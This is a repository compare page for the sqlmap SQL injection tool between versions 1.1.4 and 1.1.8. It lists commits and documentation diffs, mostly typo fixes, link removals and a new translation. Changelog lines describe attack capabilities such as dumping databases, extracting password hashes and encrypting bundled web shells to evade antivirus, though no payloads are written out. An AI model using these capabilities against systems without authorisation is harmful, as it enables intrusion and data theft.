PenTest/sqlmap
1
0
Fork 0
mirror of https://github.com/sqlmapproject/sqlmap.git synced 2025-12-07 05:01:30 +00:00
Code Issues Projects Releases Wiki Activity

Compare commits

base: PenTest:1.1.4
Branches Tags
PenTest:master PenTest:gh-pages
PenTest:1.9.12 PenTest:1.9.11 PenTest:1.9.10 PenTest:1.9.9 PenTest:1.9.8 PenTest:1.9.7 PenTest:1.9.6 PenTest:1.9.5 PenTest:1.9.4 PenTest:1.9.3 PenTest:1.9.2 PenTest:1.9 PenTest:1.8.12 PenTest:1.8.11 PenTest:1.8.10 PenTest:1.8.9 PenTest:1.8.8 PenTest:1.8.7 PenTest:1.8.6 PenTest:1.8.5 PenTest:1.8.4 PenTest:1.8.3 PenTest:1.8.2 PenTest:1.8 PenTest:1.8.1 PenTest:1.7.1 PenTest:1.7.12 PenTest:1.7.11 PenTest:1.7.10 PenTest:1.7.9 PenTest:1.7.8 PenTest:1.7.7 PenTest:1.7.6 PenTest:1.7.5 PenTest:1.7.4 PenTest:1.7.3 PenTest:1.7.2 PenTest:1.7 PenTest:1.6.12 PenTest:1.6.11 PenTest:1.6.10 PenTest:1.6.9 PenTest:1.6.8 PenTest:1.6.7 PenTest:1.6.6 PenTest:1.6.5 PenTest:1.6.4 PenTest:1.6.3 PenTest:1.6.2 PenTest:1.6 PenTest:1.5.12 PenTest:1.5.11 PenTest:1.5.10 PenTest:1.5.9 PenTest:1.5.8 PenTest:1.5.7 PenTest:1.5.6 PenTest:1.5.5 PenTest:1.5.4 PenTest:1.5.3 PenTest:1.5.2 PenTest:1.5 PenTest:1.4.12 PenTest:1.4.11 PenTest:1.4.10 PenTest:1.4.9 PenTest:1.4.8 PenTest:1.4.7 PenTest:1.4.6 PenTest:1.4.5 PenTest:1.4.4 PenTest:0.19 PenTest:1.4.3 PenTest:1.4.2 PenTest:1.4 PenTest:1.3.12 PenTest:1.3.11 PenTest:1.3.10 PenTest:1.3.9 PenTest:1.3.8 PenTest:1.3.7 PenTest:1.3.6 PenTest:1.3.5 PenTest:1.3.4 PenTest:1.3.3 PenTest:1.3.2 PenTest:1.3 PenTest:1.2.12 PenTest:1.2.11 PenTest:1.2.10 PenTest:1.2.9 PenTest:1.2.8 PenTest:1.2.7 PenTest:1.2.6 PenTest:1.2.5 PenTest:1.2.4 PenTest:1.2.3 PenTest:1.2.2 PenTest:1.2 PenTest:1.1.12 PenTest:1.1.11 PenTest:1.1.10 PenTest:1.1.9 PenTest:1.1.8 PenTest:1.1.7 PenTest:1.1.6 PenTest:1.1.5 PenTest:1.1.4 PenTest:1.1.3 PenTest:1.1.2 PenTest:1.1 PenTest:1.0.12 PenTest:1.0.11 PenTest:1.0.10 PenTest:1.0.9 PenTest:1.0.8 PenTest:1.0.7 PenTest:1.0.6 PenTest:1.0.5 PenTest:1.0.4 PenTest:1.0.3 PenTest:1.0 PenTest:0.6.2 PenTest:0.6.3 PenTest:0.6.4 PenTest:0.7-rc1 PenTest:0.8-rc2 PenTest:0.8-rc3 PenTest:0.7 PenTest:0.8-rc4 PenTest:0.8 PenTest:0.9
...
compare: PenTest:1.1.8
Branches Tags
PenTest:master PenTest:gh-pages
PenTest:1.9.12 PenTest:1.9.11 PenTest:1.9.10 PenTest:1.9.9 PenTest:1.9.8 PenTest:1.9.7 PenTest:1.9.6 PenTest:1.9.5 PenTest:1.9.4 PenTest:1.9.3 PenTest:1.9.2 PenTest:1.9 PenTest:1.8.12 PenTest:1.8.11 PenTest:1.8.10 PenTest:1.8.9 PenTest:1.8.8 PenTest:1.8.7 PenTest:1.8.6 PenTest:1.8.5 PenTest:1.8.4 PenTest:1.8.3 PenTest:1.8.2 PenTest:1.8 PenTest:1.8.1 PenTest:1.7.1 PenTest:1.7.12 PenTest:1.7.11 PenTest:1.7.10 PenTest:1.7.9 PenTest:1.7.8 PenTest:1.7.7 PenTest:1.7.6 PenTest:1.7.5 PenTest:1.7.4 PenTest:1.7.3 PenTest:1.7.2 PenTest:1.7 PenTest:1.6.12 PenTest:1.6.11 PenTest:1.6.10 PenTest:1.6.9 PenTest:1.6.8 PenTest:1.6.7 PenTest:1.6.6 PenTest:1.6.5 PenTest:1.6.4 PenTest:1.6.3 PenTest:1.6.2 PenTest:1.6 PenTest:1.5.12 PenTest:1.5.11 PenTest:1.5.10 PenTest:1.5.9 PenTest:1.5.8 PenTest:1.5.7 PenTest:1.5.6 PenTest:1.5.5 PenTest:1.5.4 PenTest:1.5.3 PenTest:1.5.2 PenTest:1.5 PenTest:1.4.12 PenTest:1.4.11 PenTest:1.4.10 PenTest:1.4.9 PenTest:1.4.8 PenTest:1.4.7 PenTest:1.4.6 PenTest:1.4.5 PenTest:1.4.4 PenTest:0.19 PenTest:1.4.3 PenTest:1.4.2 PenTest:1.4 PenTest:1.3.12 PenTest:1.3.11 PenTest:1.3.10 PenTest:1.3.9 PenTest:1.3.8 PenTest:1.3.7 PenTest:1.3.6 PenTest:1.3.5 PenTest:1.3.4 PenTest:1.3.3 PenTest:1.3.2 PenTest:1.3 PenTest:1.2.12 PenTest:1.2.11 PenTest:1.2.10 PenTest:1.2.9 PenTest:1.2.8 PenTest:1.2.7 PenTest:1.2.6 PenTest:1.2.5 PenTest:1.2.4 PenTest:1.2.3 PenTest:1.2.2 PenTest:1.2 PenTest:1.1.12 PenTest:1.1.11 PenTest:1.1.10 PenTest:1.1.9 PenTest:1.1.8 PenTest:1.1.7 PenTest:1.1.6 PenTest:1.1.5 PenTest:1.1.4 PenTest:1.1.3 PenTest:1.1.2 PenTest:1.1 PenTest:1.0.12 PenTest:1.0.11 PenTest:1.0.10 PenTest:1.0.9 PenTest:1.0.8 PenTest:1.0.7 PenTest:1.0.6 PenTest:1.0.5 PenTest:1.0.4 PenTest:1.0.3 PenTest:1.0 PenTest:0.6.2 PenTest:0.6.3 PenTest:0.6.4 PenTest:0.7-rc1 PenTest:0.8-rc2 PenTest:0.8-rc3 PenTest:0.7 PenTest:0.8-rc4 PenTest:0.8 PenTest:0.9

143 Commits
1.1.4 ... 1.1.8

Author SHA1 Message Date
Miroslav Stampar
fac6712a35 Implements #2647 (Basic authorization for sqlmapapi) 2017-08-04 13:37:49 +02:00
Miroslav Stampar
68ee1f361b Fixes #2640 2017-07-31 14:20:59 +02:00
Miroslav Stampar
62ae149464 Minor patch 2017-07-29 03:35:05 +02:00
Miroslav Stampar
f071c8500c Fixes #2634 2017-07-29 03:18:49 +02:00
Miroslav Stampar
5745d650f8 Fixes #2635 2017-07-29 02:42:20 +02:00
Miroslav Stampar
de8ea53d46 Fixes #2628 2017-07-28 00:37:33 +02:00
Miroslav Stampar
23081f83db Fixes #2626 2017-07-28 00:16:06 +02:00
Miroslav Stampar
4d56a806e8 Minor patch 2017-07-28 00:00:09 +02:00
Miroslav Stampar
1745bac0ab Fixes #2625 2017-07-26 00:54:29 +02:00
Miroslav Stampar
0f9c81965b Implementation on request 2017-07-26 00:24:13 +02:00
Miroslav Stampar
d12b65d38c Fixes #2624 2017-07-25 23:32:30 +02:00
Miroslav Stampar
38c70d9799 Minor update 2017-07-21 11:09:00 +02:00
Miroslav Stampar
a9a744fec6 Merge pull request #2620 from delvelabs/mark-steps-in-har 
Fix HAR validation for HAR viewer
 2017-07-21 11:07:16 +02:00
Louis-Philippe Huberdeau
3c5ee552f0 Make sure non-optional properties are present 2017-07-20 08:50:03 -04:00
Miroslav Stampar
8ca45695ab Minor update 2017-07-20 03:09:09 +02:00
Miroslav Stampar
bf40526785 Merge pull request #2618 from delvelabs/mark-steps-in-har 
Mark steps in HAR file
 2017-07-20 02:52:57 +02:00
Miroslav Stampar
9b41efcbe1 Minor patch 2017-07-20 02:50:34 +02:00
Miroslav Stampar
36f3fd72e6 Update for an Issue #2616 2017-07-20 02:41:47 +02:00
Louis-Philippe Huberdeau
facc54f60b Receiving some messages with a differerent header line 2017-07-19 15:40:07 -04:00
Louis-Philippe Huberdeau
4c7da11331 Make sure the comment is not set to None 2017-07-19 14:46:36 -04:00
Louis-Philippe Huberdeau
e21f67715c List is not a valid input type for timings, expecting object 2017-07-19 14:12:30 -04:00
Louis-Philippe Huberdeau
e38267a61e Include tracking properties in the HAR to identify which test the requests were associated to 2017-07-18 15:46:52 -04:00
Miroslav Stampar
7d147f613f Fixes #2611 2017-07-17 22:24:51 +02:00
Miroslav Stampar
591a60bbde Fixes #2606 2017-07-11 14:48:22 +02:00
Miroslav Stampar
3f40bf1101 Fixes #2387 2017-07-06 11:44:18 +02:00
Miroslav Stampar
d248317b89 Update for people that just download 'sqlmap.py' <- they exist 2017-07-05 16:42:54 +02:00
Miroslav Stampar
75fd878242 Minor patch 2017-07-05 15:41:53 +02:00
Miroslav Stampar
30378c8ae3 Minor patch 2017-07-05 15:27:29 +02:00
Miroslav Stampar
c9b3b47d6f Minor update 2017-07-05 14:07:21 +02:00
Miroslav Stampar
d038d027f9 Minor updates 2017-07-05 13:51:48 +02:00
Miroslav Stampar
c6577b80d9 Minor update 2017-07-05 13:35:02 +02:00
Miroslav Stampar
4a4fa07bdd Minor update 2017-07-05 12:35:48 +02:00
Miroslav Stampar
a4ebd5418f Patch for an Issue reported privately via email 2017-07-05 12:15:14 +02:00
Miroslav Stampar
ba369b73d3 Fixes #2601 2017-07-05 11:31:42 +02:00
Miroslav Stampar
614f290217 Update for #2597 2017-07-04 12:14:17 +02:00
Miroslav Stampar
1678b606a2 Update for #2597 2017-07-03 16:55:24 +02:00
Miroslav Stampar
aef5d6667f Merge pull request #2597 from delvelabs/generate-har 
Generate HAR
 2017-07-03 15:27:00 +02:00
Miroslav Stampar
b622c25f9d Fixes #2598 2017-07-03 14:17:11 +02:00
Miroslav Stampar
e07ff7168b Fixes #2599 2017-07-02 00:03:34 +02:00
Miroslav Stampar
ce48217ada Minor update 2017-07-01 23:46:28 +02:00
Louis-Philippe Huberdeau
b6969df52a Add missing httpVersion in request render, avoid encoding to base64 unless binary data is included 2017-06-29 10:14:20 -04:00
Miroslav Stampar
0e728aa73e Changing default encoding of sys.argv 2017-06-29 15:33:34 +02:00
Miroslav Stampar
f93c19ba9d Fixes #2596 2017-06-29 15:29:54 +02:00
Louis-Philippe Huberdeau
dd19527e9c Remove debug _raw entry from output 2017-06-29 09:00:02 -04:00
Miroslav Stampar
a42ddad9c1 Implements #2583 2017-06-29 14:57:35 +02:00
Miroslav Stampar
a2973296a2 Fixes #2595 2017-06-29 14:26:25 +02:00
Miroslav Stampar
0961f6a5e9 Fixes #2592 2017-06-23 23:46:25 +02:00
Louis-Philippe Huberdeau
fae965f8b6 Parse and build the response block 2017-06-23 13:28:22 -04:00
Louis-Philippe Huberdeau
0d756a8823 Parse request data and convert to HAR, include in injection data 2017-06-23 11:50:21 -04:00
Louis-Philippe Huberdeau
8df4cc3983 Adding initial hook to receive the request/response pairs 2017-06-23 09:44:33 -04:00
Miroslav Stampar
5ec44b8346 Minor refactoring 2017-06-19 23:06:05 +02:00
Miroslav Stampar
d577c57a11 Merge pull request #2590 from neargle/master 
append %A0 to the blanks set of tamper/space2mysqlblank
 2017-06-19 22:51:21 +02:00
neargle
ca24509e19 append %A0 to space2mysqlblank 2017-06-19 22:39:09 +08:00
Miroslav Stampar
e2d3187a78 Fixes #2576 2017-06-18 15:00:12 +02:00
Miroslav Stampar
b4980778dd Fixes #2577 2017-06-18 14:07:48 +02:00
Miroslav Stampar
71457fea0e Fixes #2585 2017-06-18 13:19:11 +02:00
Miroslav Stampar
34281af3f6 Minor cleaning 2017-06-14 08:13:41 -04:00
Miroslav Stampar
7dbbf3ecf5 Fixes 'codewatchorg/sqlipy/issues/12' 2017-06-07 23:19:19 +02:00
Miroslav Stampar
c41c93a404 Fixes #2568 2017-06-07 22:43:28 +02:00
Miroslav Stampar
9a7343e9f7 Fixes #2566 2017-06-07 16:07:27 +02:00
Miroslav Stampar
e0401104f2 Minor update 2017-06-07 12:55:14 +02:00
Miroslav Stampar
9da8d55128 Implements #2557 2017-06-07 11:22:06 +02:00
Miroslav Stampar
864711b434 Minor improvement 2017-06-05 16:48:14 +02:00
Miroslav Stampar
996ad59126 Minor patch 2017-06-05 16:28:19 +02:00
Miroslav Stampar
6d48df2454 Fixes #2562 2017-06-05 10:38:05 +02:00
Miroslav Stampar
55a43a837b Minor update 2017-06-02 00:50:00 +02:00
Miroslav Stampar
455d41c6a0 Merge pull request #2555 from SValkanov/master 
Bulgarian translation
 2017-06-02 00:49:01 +02:00
Miroslav Stampar
eb26dd8984 Fixes #2556 2017-06-02 00:44:01 +02:00
SValkanov
0f34300221 Edit Bulgarian translation 2017-06-01 16:51:00 +03:00
SValkanov
93a875ec71 Edit bulgarian translation 2017-06-01 16:07:47 +03:00
SValkanov
0edb4f6680 Added translation for Bulgarian language 2017-06-01 16:05:06 +03:00
Miroslav Stampar
b9b5d07336 Cleaning leftover 2017-05-30 11:41:42 +02:00
Miroslav Stampar
5f3235ef57 Fixes #2551 2017-05-30 11:40:06 +02:00
Miroslav Stampar
dfe42612be Fixes #2549 2017-05-29 10:57:27 +02:00
Miroslav Stampar
a0202f7bfd Fixes #2538 2017-05-26 16:08:30 +02:00
Miroslav Stampar
6dd9d5b2dd Fixes #2547 2017-05-26 14:34:32 +02:00
Miroslav Stampar
0864387885 Minor update 2017-05-26 14:25:22 +02:00
Miroslav Stampar
359bfb2704 Minor adjustment 2017-05-26 14:14:35 +02:00
Miroslav Stampar
644ea2e3aa Minor patch 2017-05-26 14:08:08 +02:00
Miroslav Stampar
071132cd56 Fixes #2543 2017-05-21 22:52:44 +02:00
Miroslav Stampar
7a18dde2e0 Merge pull request #2537 from HerendraTJ/patch-1 
Manual Pengguna -> Panduan Pengguna
 2017-05-18 12:13:13 +02:00
HerendraTJ
e146763399 Manual Pengguna -> Panduan Pengguna 
User Manual -> Panduan Pengguna
 2017-05-18 12:59:57 +07:00
Miroslav Stampar
4ce08dcfa3 Patch for an Issue #2536 2017-05-17 00:22:18 +02:00
Miroslav Stampar
2ca5ddce5f Fixes #2534 2017-05-15 17:03:05 +02:00
Miroslav Stampar
addb2445b7 Minor patch 2017-05-15 00:34:13 +02:00
Miroslav Stampar
4736a525b8 Fixes #2532 2017-05-13 17:28:28 +02:00
Miroslav Stampar
d3a08a2d22 Implementation for an Issue #2505 2017-05-07 23:12:42 +02:00
Miroslav Stampar
ee5b5cdcbc Fixes #2514 2017-05-04 15:50:34 +02:00
Miroslav Stampar
f3f2c81cec Minor patch (UTF8 used for HTTP params) 2017-05-04 15:45:15 +02:00
Miroslav Stampar
1e8df40981 Fixes #2499 2017-05-01 23:21:12 +02:00
Miroslav Stampar
389133654e Fixes #2508 2017-05-01 23:06:37 +02:00
Miroslav Stampar
347ce87e27 Fixes #2511 2017-05-01 22:53:12 +02:00
Miroslav Stampar
ff5a954980 Fixes #2508 2017-04-30 08:32:26 +02:00
Miroslav Stampar
1a8de2aee1 Fixes #2504 2017-04-27 13:18:29 +02:00
Miroslav Stampar
ab08273d82 Fixes #2501 2017-04-23 23:50:30 +02:00
Miroslav Stampar
fbb845ad7c Fixes #2500 2017-04-23 23:30:51 +02:00
Miroslav Stampar
15a1d55812 Fixes #2500 2017-04-23 23:14:05 +02:00
Miroslav Stampar
4643bd6517 Quick patch for #2498 2017-04-21 17:44:51 +02:00
Miroslav Stampar
1c5f01e2a2 Fixes #2487 2017-04-20 11:54:27 +02:00
Miroslav Stampar
ebbc68853d Fixes #2496 2017-04-20 10:48:04 +02:00
Miroslav Stampar
3140fd0ca6 Fixes #2495 2017-04-20 10:29:05 +02:00
Miroslav Stampar
5bcbf63ddb Fixes #2491 2017-04-19 16:13:31 +02:00
Miroslav Stampar
01fbda4bc9 Fixes #2490 2017-04-19 16:13:05 +02:00
Miroslav Stampar
ba22171a51 PEP 3113 cleanup 2017-04-19 14:56:32 +02:00
Miroslav Stampar
fc8eede952 Minor cleanup and one bug fix 2017-04-19 14:46:27 +02:00
Miroslav Stampar
c8a0c525fc Fixes #2489 2017-04-19 14:19:39 +02:00
Miroslav Stampar
46c7c28919 Implementation for an Issue #2485 2017-04-19 13:56:29 +02:00
Miroslav Stampar
81e3395975 Minor update 2017-04-19 13:35:36 +02:00
Miroslav Stampar
0340ecd38a Minor patch related to the #2487 2017-04-18 16:49:58 +02:00
Miroslav Stampar
2d05174545 Trivial update 2017-04-18 15:56:24 +02:00
Miroslav Stampar
5f2bb88037 Some code refactoring 2017-04-18 15:48:05 +02:00
Miroslav Stampar
65b02d4ab0 Minor update 2017-04-18 14:22:37 +02:00
Miroslav Stampar
ea58d29e2c Minor update 2017-04-18 14:11:23 +02:00
Miroslav Stampar
47e0fc36c7 Minor consistency update 2017-04-18 14:02:25 +02:00
Miroslav Stampar
7ebba5614a Moving brute from techniques to utils 2017-04-18 13:53:41 +02:00
Miroslav Stampar
686f53a7c6 Minor patch 2017-04-16 23:32:58 +02:00
Miroslav Stampar
67a3e8cd75 Minor patch 2017-04-14 13:19:00 +02:00
Miroslav Stampar
d9a931f77a Minor cleanup 2017-04-14 13:14:53 +02:00
Miroslav Stampar
0e206da7c0 Minor patches (pydiatra) 2017-04-14 13:08:51 +02:00
Miroslav Stampar
81e6dab965 New extra script 2017-04-14 12:54:33 +02:00
Miroslav Stampar
a702dafd03 Fixes #2481 2017-04-14 12:47:24 +02:00
Miroslav Stampar
6b48f6ec26 Merge pull request #2480 from jwilk/spelling 
Fix typos
 2017-04-14 12:22:15 +02:00
Jakub Wilk
06148cd610 Fix typos 2017-04-14 11:37:54 +02:00
Miroslav Stampar
36dfad192f Better link to user's manual 2017-04-13 12:47:14 +02:00
Miroslav Stampar
9436c43306 Mailing list is dead. Long live the mailing list 2017-04-13 12:40:37 +02:00
Miroslav Stampar
c198fd7939 Update for an Issue #13 2017-04-12 10:54:29 +02:00
Miroslav Stampar
1e092c4e8d Just in case update for an Issue #2474 2017-04-11 13:34:40 +02:00
Miroslav Stampar
1e310631ab Minor stability patch 2017-04-11 10:01:37 +02:00
Miroslav Stampar
47ee1a991f Update for an Issue #2472 2017-04-11 09:47:27 +02:00
Miroslav Stampar
9b3d229294 Fixes #2471 2017-04-10 19:21:22 +02:00
Miroslav Stampar
c74756c3bc Update regarding the #2467 2017-04-10 16:44:12 +02:00
Miroslav Stampar
1196a1b7f8 Fixes #405 2017-04-10 14:50:17 +02:00
Miroslav Stampar
c2262eda1a Update of smalldict.txt with 7 (small) more from SecLists 2017-04-07 16:30:36 +02:00
Miroslav Stampar
02eacc32c1 Minor cleanup 2017-04-07 16:30:02 +02:00
Miroslav Stampar
b1a112f72c Updating wordlist.zip file with 15 dicts from SecLists 2017-04-07 16:18:21 +02:00
Miroslav Stampar
464caf056b Minor update 2017-04-07 15:55:18 +02:00
Miroslav Stampar
44c85f8351 Reverting back the bottle.py revision because of numerous Python 2.6 incompatibilities 2017-04-07 15:10:28 +02:00
Miroslav Stampar
ad3283fd24 Another Python 2.6 patch 2017-04-07 15:05:54 +02:00
Miroslav Stampar
07208c45ef Patch of bottle.py for Python 2.6 2017-04-07 14:59:24 +02:00
Miroslav Stampar
751f423ae0 Adding latest revision of bottle.py 2017-04-07 14:55:25 +02:00
Miroslav Stampar
c124086021 Minor update for #1282 2017-04-07 14:46:41 +02:00
Miroslav Stampar
f285bc7459 Minor update 2017-04-07 14:30:52 +02:00
Miroslav Stampar
b4c4d3f72a Fixes latest Python 2.6 compatibility issues 2017-04-06 11:37:42 +02:00
102 changed files with 2565 additions and 1259 deletions
Expand all files Collapse all files

2
.gitattributes vendored
View File

@@ -1,6 +1,8 @@
*.conf text eol=lf
*.md text eol=lf
*.md5 text eol=lf
*.py text eol=lf
*.xml text eol=lf
*_ binary
*.dll binary

6
README.md
View File

@@ -34,7 +34,7 @@ To get a list of all options and switches use:
python sqlmap.py -hh
You can find a sample run [here](https://asciinema.org/a/46601).
To get an overview of sqlmap capabilities, list of supported features and description of all options and switches, along with examples, you are advised to consult the [user's manual](https://github.com/sqlmapproject/sqlmap/wiki).
To get an overview of sqlmap capabilities, list of supported features and description of all options and switches, along with examples, you are advised to consult the [user's manual](https://github.com/sqlmapproject/sqlmap/wiki/Usage).
Links
----
@@ -45,9 +45,6 @@ Links
* Issue tracker: https://github.com/sqlmapproject/sqlmap/issues
* User's manual: https://github.com/sqlmapproject/sqlmap/wiki
* Frequently Asked Questions (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
* Mailing list subscription: https://lists.sourceforge.net/lists/listinfo/sqlmap-users
* Mailing list RSS feed: http://rss.gmane.org/messages/complete/gmane.comp.security.sqlmap
* Mailing list archive: http://news.gmane.org/gmane.comp.security.sqlmap
* Twitter: [@sqlmap](https://twitter.com/sqlmap)
* Demos: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos)
* Screenshots: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
@@ -55,6 +52,7 @@ Links
Translations
----
* [Bulgarian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-bg-BG.md)
* [Chinese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-zh-CN.md)
* [Croatian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-hr-HR.md)
* [French](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-fr-FR.md)

8
doc/CHANGELOG.md
View File

@@ -83,7 +83,7 @@
* Added option `--sql-file` for setting file(s) holding SQL statements to be executed (in case of stacked SQLi).
* Added switch `--sqlmap-shell` to turn on interactive sqlmap shell prompt.
* Added option `--test-filter` for test filtration by payloads and/or titles (e.g. `ROW`).
* Added option `--test-skip` for skiping tests by payloads and/or titles (e.g. `BENCHMARK`).
* Added option `--test-skip` for skipping tests by payloads and/or titles (e.g. `BENCHMARK`).
* Added switch `--titles` to turn on comparison of pages based only on their titles.
* Added option `--tor-port` to explicitly set Tor proxy port.
* Added option `--tor-type` to set Tor proxy type (`HTTP` (default), `SOCKS4` or `SOCKS5`).
@@ -149,7 +149,7 @@
* Major bugs fixed.
* Cleanup of UDF source code repository, https://svn.sqlmap.org/sqlmap/trunk/sqlmap/extra/udfhack.
* Major code cleanup.
* Added simple file encryption/compression utility, extra/cloak/cloak.py, used by sqlmap to decrypt on the fly Churrasco, UPX executable and web shells consequently reducing drastically the number of anti-virus softwares that mistakenly mark sqlmap as a malware.
* Added simple file encryption/compression utility, extra/cloak/cloak.py, used by sqlmap to decrypt on the fly Churrasco, UPX executable and web shells consequently reducing drastically the number of anti-virus software that mistakenly mark sqlmap as a malware.
* Updated user's manual.
* Created several demo videos, hosted on YouTube (http://www.youtube.com/user/inquisb) and linked from http://sqlmap.org/demo.html.
@@ -302,7 +302,7 @@
* Added support to extract database users password hash on Microsoft SQL Server;
* Added a fuzzer function with the aim to parse HTML page looking for standard database error messages consequently improving database fingerprinting;
* Added support for SQL injection on HTTP Cookie and User-Agent headers;
* Reviewed HTTP request library (lib/request.py) to support the extended inband SQL injection functionality. Splitted getValue() into getInband() and getBlind();
* Reviewed HTTP request library (lib/request.py) to support the extended inband SQL injection functionality. Split getValue() into getInband() and getBlind();
* Major enhancements in common library and added checkForBrackets() method to check if the bracket(s) are needed to perform a UNION query SQL injection attack;
* Implemented `--dump-all` functionality to dump entire DBMS data from all databases tables;
* Added support to exclude DBMS system databases' when enumeration tables and dumping their entries (`--exclude-sysdbs`);
@@ -335,7 +335,7 @@
* Added inband SQL injection (UNION query) support (`--union-use`);
* Complete code refactoring, a lot of minor and some major fixes in libraries, many minor improvements;
* Reviewed the directory tree structure;
* Splitted lib/common.py: inband injection functionalities now are moved to lib/union.py;
* Split lib/common.py: inband injection functionalities now are moved to lib/union.py;
* Updated documentation files.
# Version 0.3 (2007-01-20)

75
doc/CONTRIBUTING.md
View File

@@ -1,38 +1,37 @@
# Contributing to sqlmap
## Reporting bugs
**Bug reports are welcome**!
Please report all bugs on the [issue tracker](https://github.com/sqlmapproject/sqlmap/issues).
### Guidelines
* Before you submit a bug report, search both [open](https://github.com/sqlmapproject/sqlmap/issues?q=is%3Aopen+is%3Aissue) and [closed](https://github.com/sqlmapproject/sqlmap/issues?q=is%3Aissue+is%3Aclosed) issues to make sure the issue has not come up before. Also, check the [user's manual](https://github.com/sqlmapproject/sqlmap/wiki) for anything relevant.
* Make sure you can reproduce the bug with the latest development version of sqlmap.
* Your report should give detailed instructions on how to reproduce the problem. If sqlmap raises an unhandled exception, the entire traceback is needed. Details of the unexpected behaviour are welcome too. A small test case (just a few lines) is ideal.
* If you are making an enhancement request, lay out the rationale for the feature you are requesting. *Why would this feature be useful?*
* If you are not sure whether something is a bug, or want to discuss a potential new feature before putting in an enhancement request, the [mailing list](https://lists.sourceforge.net/lists/listinfo/sqlmap-users) is a good place to bring it up.
## Submitting code changes
All code contributions are greatly appreciated. First off, clone the [Git repository](https://github.com/sqlmapproject/sqlmap), read the [user's manual](https://github.com/sqlmapproject/sqlmap/wiki) carefully, go through the code yourself and [drop us an email](mailto:dev@sqlmap.org) if you are having a hard time grasping its structure and meaning. We apologize for not commenting the code enough - you could take a chance to read it through and [improve it](https://github.com/sqlmapproject/sqlmap/issues/37).
Our preferred method of patch submission is via a Git [pull request](https://help.github.com/articles/using-pull-requests).
Many [people](https://raw.github.com/sqlmapproject/sqlmap/master/doc/THANKS.md) have contributed in different ways to the sqlmap development. **You** can be the next!
### Guidelines
In order to maintain consistency and readability throughout the code, we ask that you adhere to the following instructions:
* Each patch should make one logical change.
* Wrap code to 76 columns when possible.
* Avoid tabbing, use four blank spaces instead.
* Before you put time into a non-trivial patch, it is worth discussing it on the [mailing list](https://lists.sourceforge.net/lists/listinfo/sqlmap-users) or privately by [email](mailto:dev@sqlmap.org).
* Do not change style on numerous files in one single pull request, we can [discuss](mailto:dev@sqlmap.org) about those before doing any major restyling, but be sure that personal preferences not having a strong support in [PEP 8](http://www.python.org/dev/peps/pep-0008/) will likely to be rejected.
* Make changes on less than five files per single pull request - there is rarely a good reason to have more than five files changed on one pull request, as this dramatically increases the review time required to land (commit) any of those pull requests.
* Style that is too different from main branch will be ''adapted'' by the developers side.
* Do not touch anything inside `thirdparty/` and `extra/` folders.
### Licensing
By submitting code contributions to the sqlmap developers, to the mailing list, or via Git pull request, checking them into the sqlmap source code repository, it is understood (unless you specify otherwise) that you are offering the sqlmap copyright holders the unlimited, non-exclusive right to reuse, modify, and relicense the code. This is important because the inability to relicense code has caused devastating problems for other software projects (such as KDE and NASM). If you wish to specify special license conditions of your contributions, just say so when you send them.
# Contributing to sqlmap
## Reporting bugs
**Bug reports are welcome**!
Please report all bugs on the [issue tracker](https://github.com/sqlmapproject/sqlmap/issues).
### Guidelines
* Before you submit a bug report, search both [open](https://github.com/sqlmapproject/sqlmap/issues?q=is%3Aopen+is%3Aissue) and [closed](https://github.com/sqlmapproject/sqlmap/issues?q=is%3Aissue+is%3Aclosed) issues to make sure the issue has not come up before. Also, check the [user's manual](https://github.com/sqlmapproject/sqlmap/wiki) for anything relevant.
* Make sure you can reproduce the bug with the latest development version of sqlmap.
* Your report should give detailed instructions on how to reproduce the problem. If sqlmap raises an unhandled exception, the entire traceback is needed. Details of the unexpected behaviour are welcome too. A small test case (just a few lines) is ideal.
* If you are making an enhancement request, lay out the rationale for the feature you are requesting. *Why would this feature be useful?*
## Submitting code changes
All code contributions are greatly appreciated. First off, clone the [Git repository](https://github.com/sqlmapproject/sqlmap), read the [user's manual](https://github.com/sqlmapproject/sqlmap/wiki) carefully, go through the code yourself and [drop us an email](mailto:dev@sqlmap.org) if you are having a hard time grasping its structure and meaning. We apologize for not commenting the code enough - you could take a chance to read it through and [improve it](https://github.com/sqlmapproject/sqlmap/issues/37).
Our preferred method of patch submission is via a Git [pull request](https://help.github.com/articles/using-pull-requests).
Many [people](https://raw.github.com/sqlmapproject/sqlmap/master/doc/THANKS.md) have contributed in different ways to the sqlmap development. **You** can be the next!
### Guidelines
In order to maintain consistency and readability throughout the code, we ask that you adhere to the following instructions:
* Each patch should make one logical change.
* Wrap code to 76 columns when possible.
* Avoid tabbing, use four blank spaces instead.
* Before you put time into a non-trivial patch, it is worth discussing it privately by [email](mailto:dev@sqlmap.org).
* Do not change style on numerous files in one single pull request, we can [discuss](mailto:dev@sqlmap.org) about those before doing any major restyling, but be sure that personal preferences not having a strong support in [PEP 8](http://www.python.org/dev/peps/pep-0008/) will likely to be rejected.
* Make changes on less than five files per single pull request - there is rarely a good reason to have more than five files changed on one pull request, as this dramatically increases the review time required to land (commit) any of those pull requests.
* Style that is too different from main branch will be ''adapted'' by the developers side.
* Do not touch anything inside `thirdparty/` and `extra/` folders.
### Licensing
By submitting code contributions to the sqlmap developers or via Git pull request, checking them into the sqlmap source code repository, it is understood (unless you specify otherwise) that you are offering the sqlmap copyright holders the unlimited, non-exclusive right to reuse, modify, and relicense the code. This is important because the inability to relicense code has caused devastating problems for other software projects (such as KDE and NASM). If you wish to specify special license conditions of your contributions, just say so when you send them.

16
doc/COPYING
View File

@@ -46,14 +46,14 @@ to know exactly what a program is going to do before they run it.
Source code also allows you to fix bugs and add new features. You are
highly encouraged to send your changes to dev@sqlmap.org for possible
incorporation into the main distribution. By sending these changes to the
sqlmap developers, to the mailing lists, or via Git pull request, checking
them into the sqlmap source code repository, it is understood (unless you
specify otherwise) that you are offering the sqlmap project the unlimited,
non-exclusive right to reuse, modify, and relicense the code. sqlmap will
always be available Open Source, but this is important because the
inability to relicense code has caused devastating problems for other Free
Software projects (such as KDE and NASM). If you wish to specify special
license conditions of your contributions, just say so when you send them.
sqlmap developers or via Git pull request, checking them into the sqlmap
source code repository, it is understood (unless you specify otherwise)
that you are offering the sqlmap project the unlimited, non-exclusive
right to reuse, modify, and relicense the code. sqlmap will always be
available Open Source, but this is important because the inability to
